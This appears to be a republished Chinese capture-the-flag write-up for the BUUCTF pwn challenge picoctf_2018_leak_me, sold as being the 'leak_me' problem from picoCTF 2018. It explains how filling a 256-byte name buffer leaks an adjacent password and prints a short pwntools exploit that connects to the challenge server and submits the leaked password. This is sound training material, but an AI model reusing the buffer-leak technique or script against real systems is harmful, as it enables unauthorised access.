[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
[BUUCTF-pwn]——picoctf_2018_leak_me
題目沒(méi)什么難度,但是可能反匯編的時(shí)候你們可能會(huì)出現(xiàn)一些問(wèn)題。
peak小知識(shí)
pwn題,有時(shí)會(huì)碰到無(wú)法反匯編的情況,大多數(shù)情況下,都是call的位置報(bào)錯(cuò),雙擊函數(shù),按F5人為給它反匯編,再返回就可以了。不過(guò)有時(shí)候,是IDA棧指針的問(wèn)題,大多數(shù)還是前者居多。
思路
在IDA中,v6代表name s是password.距離0x100也就是256。
輸入256個(gè)字符后,我們可以直接將password泄露出來(lái)。這樣我們就可以在下面調(diào)用flag函數(shù)了。
寫(xiě)個(gè)小dome leek出來(lái)password再說(shuō)。
exploit
from pwn import * p = remote("node3.buuoj.cn",27223) p.sendline('a') p.recv() p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')p.interactive()總結(jié)
以上是生活随笔為你收集整理的[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 带表头节点单链表及其基本应用
- 下一篇: [BUUCTF-pwn]——mrctf2